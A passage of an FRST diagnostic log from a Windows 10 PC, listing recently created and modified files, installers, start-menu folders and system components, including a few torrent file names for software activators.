2016-09-29 12:08 - 2016-09-29 12:08 - 16396256 _____ (Irfan Skiljan) C:\Users\admin\Downloads\irfanview_plugins_442_setup.exe
2016-09-29 12:08 - 2016-09-29 12:08 - 03367392 _____ (Irfan Skiljan) C:\Users\admin\Downloads\iview442_x64_setup.exe
2016-09-29 12:08 - 2016-09-29 12:08 - 02131936 _____ (Irfan Skiljan) C:\Users\admin\Downloads\iview442_setup.exe
2016-09-29 11:32 - 2016-09-29 11:32 - 00449672 _____ C:\Users\admin\Downloads\PROCEDURA SSM.pdf
2016-09-29 10:15 - 2016-09-29 10:15 - 00170078 _____ C:\Users\admin\Downloads\6124_FP_20160928183706_raport-curent-materiale-de-prezentare-AGA-11-OCT-2016.pdf
2016-09-29 10:13 - 2016-09-29 10:13 - 00300388 _____ C:\Users\admin\Downloads\6124_FP_20160928170015_notificare-saptamanala-program-rascumparare--22---27-septemb.pdf
2016-09-29 10:08 - 2016-09-29 10:08 - 00188108 _____ C:\Users\admin\Downloads\6124_FP_20160928184159_raport-curent-actualizare-privind-programele-de-rascumparare.pdf
2016-09-29 09:20 - 2016-09-29 09:20 - 00000000 ____D C:\Users\admin\AppData\Roaming\fontconfig
2016-09-29 09:19 - 2016-09-29 09:25 - 00000000 ____D C:\Users\admin\AppData\Roaming\Aegisub
2016-09-29 09:18 - 2016-09-29 09:19 - 00000000 ____D C:\Program Files\Aegisub
2016-09-29 09:18 - 2016-09-29 09:18 - 00001139 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASSDraw3.lnk
2016-09-29 09:18 - 2016-09-29 09:18 - 00001110 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Aegisub.lnk
2016-09-29 09:17 - 2016-09-29 09:18 - 19602087 _____ (Aegisub Team ) C:\Users\admin\Downloads\Aegisub-3.2.2-32.exe
2016-09-29 08:53 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Subtitle Edit
2016-09-29 08:53 - 2016-09-29 09:05 - 00000000 ____D C:\Users\admin\AppData\Roaming\Subtitle Edit
2016-09-29 08:53 - 2016-09-29 08:53 - 00002104 _____ C:\Users\admin\Desktop\Subtitle Edit.lnk
2016-09-29 08:53 - 2016-09-29 08:53 - 00000000 ____D C:\Program Files\Subtitle Edit
2016-09-28 11:57 - 2016-09-28 12:13 - 00000000 ____D C:\Users\admin\AppData\Roaming\obs-studio
2016-09-28 11:50 - 2016-09-28 11:51 - 00000000 ____D C:\Program Files\obs-studio
2016-09-28 11:49 - 2016-09-28 11:50 - 97260048 _____ (obsproject.com) C:\Users\admin\Downloads\OBS-Studio-0.16.0-Full-Installer.exe
2016-09-28 11:43 - 2016-09-28 11:43 - 00276491 _____ C:\Users\admin\Downloads\1787_TLV-Tranzactii pers initiate2 26.09.2016.pdf
2016-09-27 11:06 - 2016-09-27 11:06 - 01038154 _____ C:\Users\admin\Downloads\ordin 4.577_2016.pdf
2016-09-27 10:23 - 2016-09-27 10:23 - 00175437 _____ C:\Users\admin\Downloads\6124_FP_20160926184037_raport-curent-propunere-distributie-numerar-speciala_26-sept.pdf
2016-09-27 10:14 - 2016-09-27 10:14 - 00000000 ____D C:\ProgramData\ABBYY
2016-09-23 15:51 - 2016-09-23 15:51 - 00236050 _____ C:\Users\admin\Downloads\6124_FP_20160923113555_raport-curent-vanzare-partiala-OMV-Petrom_23-sept-2016.pdf
2016-09-23 13:16 - 2016-09-23 13:16 - 00001053 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Livestream Producer - Windows.lnk
2016-09-23 13:16 - 2016-09-23 13:16 - 00001047 _____ C:\Users\Public\Desktop\Livestream Producer - Windows.lnk
2016-09-23 13:15 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Livestream Producer
2016-09-23 13:15 - 2016-09-23 13:16 - 00000000 ____D C:\Users\admin\AppData\Local\Producer
2016-09-23 13:15 - 2016-09-23 13:16 - 00000000 ____D C:\Program Files\Livestream Producer
2016-09-23 12:32 - 2016-10-03 14:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio
2016-09-23 12:32 - 2016-09-28 11:52 - 00001239 _____ C:\Users\Public\Desktop\OBS Studio.lnk
2016-09-23 12:22 - 2016-09-23 12:23 - 00020992 _____ C:\Users\admin\Downloads\DE COMPLETAT situatia unitatilor de invatamant 2016 septembrie (1).xls
2016-09-23 12:21 - 2016-09-23 12:30 - 97255680 _____ C:\Users\admin\Downloads\OBS-Studio-0.15.4-With-Browser-Installer.exe
2016-09-22 12:15 - 2016-10-03 08:54 - 00000000 ____D C:\Program Files\Mozilla Firefox
2016-09-22 11:51 - 2016-09-22 11:51 - 00420108 _____ C:\Users\admin\Downloads\6124_FP_20160921194259_raport-curent-convocator-AGA-31-octombrie-2016_21-sept-2016.pdf
2016-09-22 09:16 - 2016-10-03 14:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ESET
2016-09-22 09:16 - 2016-09-22 09:16 - 00002106 _____ C:\Users\Public\Desktop\ESET Banking & Payment protection.lnk
2016-09-22 09:16 - 2016-09-22 09:16 - 00000000 ____D C:\ProgramData\ESET
2016-09-22 09:15 - 2016-09-22 09:15 - 00000000 ____D C:\Program Files\ESET
2016-09-21 10:28 - 2016-09-21 10:28 - 00000000 ____D C:\Users\admin\Documents\Lightshot
2016-09-20 11:52 - 2016-09-20 11:53 - 45032224 _____ C:\Users\admin\Downloads\Firefox-Setup-47-0.exe
2016-09-20 11:51 - 2016-09-20 11:51 - 00242136 _____ C:\Users\admin\Downloads\Firefox Setup Stub 48.0.2.exe
2016-09-20 09:52 - 2016-09-20 09:52 - 00278100 _____ C:\Users\admin\Downloads\1787_TLV-Tranzactii pers initiate 16.09.2016.pdf
2016-09-20 09:51 - 2016-09-20 09:51 - 00279942 _____ C:\Users\admin\Downloads\1787_TLV-Tranzactii pers initiate2 16.09.2016.pdf
2016-09-19 14:47 - 2016-09-19 14:47 - 00011776 _____ C:\Users\admin\Downloads\MODEL - situatia unitatilor de invatamant 2016 septembrie-.xls
2016-09-19 14:47 - 2016-09-19 14:47 - 00009728 _____ C:\Users\admin\Downloads\DE COMPLETAT situatia unitatilor de invatamant 2016 septembrie.xls
2016-09-19 14:07 - 2016-09-19 14:07 - 00017408 _____ C:\Users\admin\Downloads\FP - DIVIDENDE 2015 SI 2016 (1).xls
2016-09-19 14:06 - 2016-09-19 14:06 - 00164963 _____ C:\Users\admin\Downloads\6124_FP_20160913223240_raport-curent-decontare.pdf
2016-09-19 14:05 - 2016-09-19 14:05 - 00298072 _____ C:\Users\admin\Downloads\6124_FP_20160915112933_notificare-saptamanala-program-rascumparare--8---14-septembr (2).pdf
2016-09-19 13:37 - 2016-09-19 13:37 - 00000000 ____D C:\Users\admin\Downloads\Fiºiere ataºate_2016919
2016-09-19 10:19 - 2016-09-19 10:19 - 00014284 _____ C:\Users\admin\Downloads\Film Complet en Francais (2016) 1080p BluRay Rip DD5.1.x264-HD.torrent
2016-09-16 15:39 - 2016-09-16 15:39 - 00298072 _____ C:\Users\admin\Downloads\6124_FP_20160915112933_notificare-saptamanala-program-rascumparare--8---14-septembr (1).pdf
2016-09-16 12:26 - 2016-09-16 12:26 - 00012892 _____ C:\Users\admin\Downloads\[kat.cr]microsoft.office.pro.plus.2016.v16.0.4266.1003.rtm.activator.techtools.torrent
2016-09-16 11:34 - 2016-09-16 11:34 - 00290699 _____ C:\Users\admin\Downloads\1787_TLV_20160915105648_BTComunicat-de-presa_Identitate-de-brand-noua_15.09.2016.pdf
2016-09-15 15:30 - 2016-09-15 15:32 - 00000000 ____D C:\Users\admin\Downloads\Cum sa ai televiziune gratis
2016-09-15 13:28 - 2016-09-15 13:28 - 00298072 _____ C:\Users\admin\Downloads\6124_FP_20160915112933_notificare-saptamanala-program-rascumparare--8---14-septembr.pdf
2016-09-15 12:28 - 2016-09-15 12:28 - 00000000 ____D C:\Users\admin\AppData\Roaming\.tvmaxe
2016-09-15 12:26 - 2016-10-03 14:45 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SopCast
2016-09-15 12:26 - 2016-09-15 12:26 - 00001024 _____ C:\Users\admin\Desktop\SopCast.lnk
2016-09-15 12:26 - 2016-09-15 12:26 - 00000000 ____D C:\Program Files\SopCast
2016-09-13 16:13 - 2016-09-13 16:13 - 00001076 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 11.lnk
2016-09-13 16:13 - 2016-09-13 16:13 - 00001064 _____ C:\Users\Public\Desktop\TeamViewer 11.lnk
2016-09-13 16:11 - 2016-09-13 16:11 - 12327328 _____ (TeamViewer GmbH) C:\Users\admin\Downloads\TeamViewer_Setup-aayn.exe
2016-09-13 12:56 - 2016-09-13 12:56 - 00064083 _____ C:\Users\admin\Downloads\AMS_Report_1473760592179.pdf
2016-09-13 12:43 - 2016-09-13 12:43 - 00001067 _____ C:\Users\admin\Downloads\Windows.10.Pro.Permanent.Activator-2016-FiLELiST.torrent
2016-09-13 12:40 - 2016-09-13 12:40 - 00171336 _____ C:\Users\admin\Downloads\Microsoft.Windows.10.PRO.1511.Build.10586.OEM.June.2016.FULL-FILELIST.torrent
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-10-13 12:03 - 2016-06-14 08:57 - 00018449 _____ C:\Users\admin\Downloads\FRST.txt
2016-10-13 12:00 - 2016-06-14 08:57 - 00000000 ____D C:\FRST
2016-10-13 12:00 - 2016-06-14 08:56 - 01757184 _____ (Farbar) C:\Users\admin\Downloads\FRST.exe
2016-10-13 11:44 - 2016-01-20 12:42 - 00000000 ___RD C:\Users\admin\Google Drive
2016-10-13 11:43 - 2015-04-20 13:02 - 00000000 ___RD C:\Users\admin\OneDrive
2016-10-13 11:41 - 2016-07-16 05:22 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2016-10-13 11:36 - 2016-03-18 17:29 - 00000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2016-10-13 11:00 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-10-13 10:49 - 2016-07-16 11:29 - 00000000 ___SD C:\WINDOWS\system32\DiagSvcs
2016-10-13 10:49 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-10-13 10:49 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\migwiz
2016-10-13 10:48 - 2016-07-16 11:29 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-10-13 10:48 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-10-13 10:48 - 2016-07-16 11:29 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-10-13 10:48 - 2016-07-16 11:28 - 00000000 ____D C:\WINDOWS\INF
2016-10-13 10:45 - 2016-07-16 11:19 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-10-13 09:01 - 2016-07-16 11:29 - 00000000 ___HD C:\Program Files\WindowsApps
2016-10-12 11:42 - 2014-11-11 11:04 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-10-12 11:20 - 2014-11-11 11:04 - 141042968 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-10-12 08:33 - 2016-07-01 16:34 - 00000000 ____D C:\Program Files\InfraRecorder
2016-10-11 11:12 - 2016-01-18 10:26 - 00000000 ____D C:\Users\admin\AppData\Roaming\vlc
2016-10-10 09:47 - 2016-06-23 14:31 - 00206472 _____ (ESET) C:\WINDOWS\system32\Drivers\eamonm.sys
2016-10-10 09:10 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-10-07 10:02 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2016-10-07 09:51 - 2014-11-12 13:03 - 00000000 ____D C:\Users\admin\AppData\Roaming\uTorrent
2016-10-06 09:59 - 2016-01-25 12:26 - 00000000 ____D C:\Users\admin\AppData\Local\Packages
2016-10-06 08:54 - 2015-12-09 10:43 - 00000690 _____ C:\WINDOWS\Tasks\G2MUploadTask-S-1-5-21-4142771536-1505296934-324239511-1000.job
2016-10-06 08:54 - 2015-12-09 10:43 - 00000594 _____ C:\WINDOWS\Tasks\G2MUpdateTask-S-1-5-21-4142771536-1505296934-324239511-1000.job
2016-10-05 17:32 - 2014-11-10 22:59 - 00389418 __RSH C:\bootmgr
2016-10-04 10:08 - 2014-12-18 12:31 - 00002226 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-10-04 08:56 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\appcompat
2016-10-04 01:28 - 2016-07-16 11:30 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2016-10-04 01:19 - 2016-07-16 13:18 - 00000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ___SD C:\WINDOWS\system32\dsc
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ___RD C:\Program Files\Windows Defender
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\setup
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\et-EE
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\es-MX
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\en-GB
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\Provisioning
2016-10-04 01:19 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-10-04 01:19 - 2016-07-16 05:22 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-10-04 01:02 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2016-10-04 01:02 - 2016-07-16 11:26 - 01003008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00265728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys
2016-10-04 01:02 - 2016-07-16 11:26 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb
2016-10-04 01:02 - 2016-07-16 11:26 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb
2016-10-04 01:02 - 2016-07-16 11:26 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb
2016-10-04 01:02 - 2016-07-16 11:26 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00044544 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe
2016-10-04 01:02 - 2016-07-16 11:26 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb
2016-10-04 01:02 - 2016-07-16 11:26 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe
2016-10-04 01:02 - 2016-07-16 11:26 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2016-10-04 01:02 - 2016-07-16 11:26 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2016-10-04 01:02 - 2016-07-16 11:26 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof
2016-10-03 23:09 - 2016-07-16 11:31 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerApp.exe
2016-10-03 23:09 - 2016-07-16 11:31 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\FlashPlayerCPLApp.cpl
2016-10-03 16:03 - 2015-03-18 10:16 - 00000400 __RSH C:\ProgramData\ntuser.pol
2016-10-03 15:30 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\rescache
2016-10-03 15:29 - 2016-07-16 11:29 - 00000000 ____D C:\ProgramData\USOPrivate
2016-10-03 15:29 - 2016-01-25 12:27 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-10-03 15:16 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2016-10-03 15:16 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\Registration
2016-10-03 15:16 - 2015-10-30 08:48 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2016-10-03 15:09 - 2016-01-25 12:09 - 00021412 _____ C:\WINDOWS\system32\emptyregdb.dat
2016-10-03 15:07 - 2016-07-16 11:29 - 00000000 __RHD C:\Users\Public\Libraries
2016-10-03 15:07 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\Media
2016-10-03 14:52 - 2016-08-30 09:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lightshot
2016-10-03 14:52 - 2016-07-16 11:29 - 00000000 ___SD C:\WINDOWS\Downloaded Program Files
2016-10-03 14:52 - 2016-07-07 12:20 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF Converter Elite
2016-10-03 14:52 - 2016-07-01 16:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\InfraRecorder
2016-10-03 14:52 - 2016-06-30 10:48 - 00000000 ____D C:\WINDOWS\system32\DRVSRC
2016-10-03 14:52 - 2016-06-30 10:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KONICA MINOLTA 226 Scanner
2016-10-03 14:52 - 2016-05-23 14:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FreeOCR
2016-10-03 14:52 - 2016-05-23 13:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\newfolder1
2016-10-03 14:52 - 2016-04-25 09:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EaseUS Partition Master 10.8
2016-10-03 14:52 - 2016-04-21 12:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2016-10-03 14:52 - 2016-04-06 12:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Web Start
2016-10-03 14:52 - 2016-03-23 10:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Free Alarm Clock
2016-10-03 14:52 - 2016-02-15 09:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Kolor Autopano Giga 4.0
2016-10-03 14:52 - 2016-02-10 13:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF-XChange PDF Viewer
2016-10-03 14:52 - 2016-01-28 10:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinPcap
2016-10-03 14:52 - 2016-01-20 12:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2016-10-03 14:52 - 2016-01-18 10:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN
2016-10-03 14:52 - 2015-11-02 10:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Whiteboard V3.0.150611
2016-10-03 14:52 - 2015-09-08 15:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader FIX
2016-10-03 14:52 - 2015-09-03 12:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FXCC - MetaTrader 4
2016-10-03 14:52 - 2015-08-24 09:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FileSeek
2016-10-03 14:52 - 2015-04-27 09:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Partition Bad Disk
2016-10-03 14:52 - 2015-04-03 10:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon iP4300 Manual
2016-10-03 14:52 - 2015-04-03 10:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon iP4300
2016-10-03 14:52 - 2015-03-26 16:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Doublekiller Pro
2016-10-03 14:52 - 2015-03-24 13:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Remove Empty Directories
2016-10-03 14:52 - 2015-03-23 15:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GoodSync
2016-10-03 14:52 - 2015-03-12 13:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\EDU Stiinte ale naturii 3
2016-10-03 14:52 - 2015-02-16 15:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ghostscript
2016-10-03 14:52 - 2015-02-11 15:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\FXCM MetaTrader 4
2016-10-03 14:52 - 2015-02-09 13:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DVDVideoSoft
2016-10-03 14:52 - 2015-02-06 10:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Convert AVI to MP4
2016-10-03 14:52 - 2015-02-05 17:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinFF
2016-10-03 14:52 - 2015-02-02 09:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader 4 FinFX
2016-10-03 14:52 - 2015-01-30 11:45 - 00000000 ____D C:\WINDOWS\system32\Cult3D
2016-10-03 14:52 - 2015-01-29 16:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader 4 IC Markets
2016-10-03 14:52 - 2015-01-22 13:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader-Admiral Markets
2016-10-03 14:52 - 2015-01-22 11:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader 4 Admiral Markets AS
2016-10-03 14:52 - 2015-01-08 10:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media
2016-10-03 14:52 - 2015-01-08 10:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Xvid
2016-10-03 14:52 - 2015-01-08 10:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\x264vfw
2016-10-03 14:52 - 2015-01-06 15:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CamStudio 2.7
2016-10-03 14:52 - 2014-12-15 16:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mobile Partner
2016-10-03 14:52 - 2014-12-03 11:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Disable Autorun
2016-10-03 14:52 - 2014-11-24 13:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ColorPage-HR7X Slim V2.1
2016-10-03 14:52 - 2014-11-18 10:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-10-03 14:52 - 2014-11-17 10:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NetBeans
2016-10-03 14:52 - 2014-11-14 13:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Digi Net Mobile
2016-10-03 14:52 - 2014-11-14 09:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MetaTrader 5
2016-10-03 14:52 - 2014-11-12 15:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexmark
2016-10-03 14:52 - 2014-11-12 12:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MagicDisc
2016-10-03 14:52 - 2014-11-12 11:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinISO
2016-10-03 14:52 - 2014-11-12 11:24 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft LifeCam
2016-10-03 14:52 - 2014-11-11 13:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MWSnap
2016-10-03 14:51 - 2016-06-27 10:59 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Crystal Eye Webcam
2016-10-03 14:51 - 2016-05-27 13:12 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CD to MP3 Freeware
2016-10-03 14:51 - 2016-05-09 13:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ActiveState ActiveTcl 8.6.4.1
2016-10-03 14:51 - 2016-02-29 14:12 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinDirStat
2016-10-03 14:51 - 2015-10-11 15:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Aquila Technology
2016-10-03 14:51 - 2015-03-10 18:56 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Games
2016-10-03 14:51 - 2015-03-05 13:21 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows 7 USB DVD Download Tool
2016-10-03 14:51 - 2015-02-12 19:07 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IC Markets cTrader
2016-10-03 14:51 - 2015-01-05 13:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip
2016-10-03 14:51 - 2014-11-18 10:58 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-10-03 14:51 - 2014-11-11 14:07 - 00000000 ____D C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IrfanView
2016-10-03 14:50 - 2016-07-16 11:29 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-10-03 14:50 - 2015-10-30 08:13 - 00000000 ____D C:\Users\Default.migrated
2016-10-03 14:47 - 2016-07-16 13:15 - 00000000 ____D C:\WINDOWS\OCR
2016-10-03 14:47 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\spool
2016-10-03 14:47 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\system32\IME
2016-10-03 14:47 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\schemas
2016-10-03 14:47 - 2016-07-16 11:29 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2016-10-03 14:47 - 2016-04-21 15:13 - 00000000 __SHD C:\WINDOWS\system32\AI_RecycleBin
2016-10-03 14:47 - 2015-10-30 09:58 - 00000000 ____D C:\WINDOWS\ShellNew
2016-10-03 14:47 - 2015-04-03 10:13 - 00000000 ___HD C:\WINDOWS\system32\CanonIJ Uninstaller Information
2016-10-03 14:47 - 2015-01-06 13:58 - 00000000 ____D C:\WINDOWS\system32\MTSLog
2016-10-03 14:47 - 2014-11-17 10:49 - 00000000 ____D C:\WINDOWS\system32\appmgmt
2016-10-03 14:47 - 2014-11-13 09:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2016-10-03 14:47 - 2011-04-12 05:24 - 00000000 ___RD C:\Users\Public\Recorded TV
2016-10-03 14:46 - 2016-09-01 11:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bandicam
2016-10-03 14:46 - 2016-07-16 11:29 - 00000000 __SHD C:\Program Files\Windows Sidebar
2016-10-03 14:46 - 2016-07-16 11:29 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
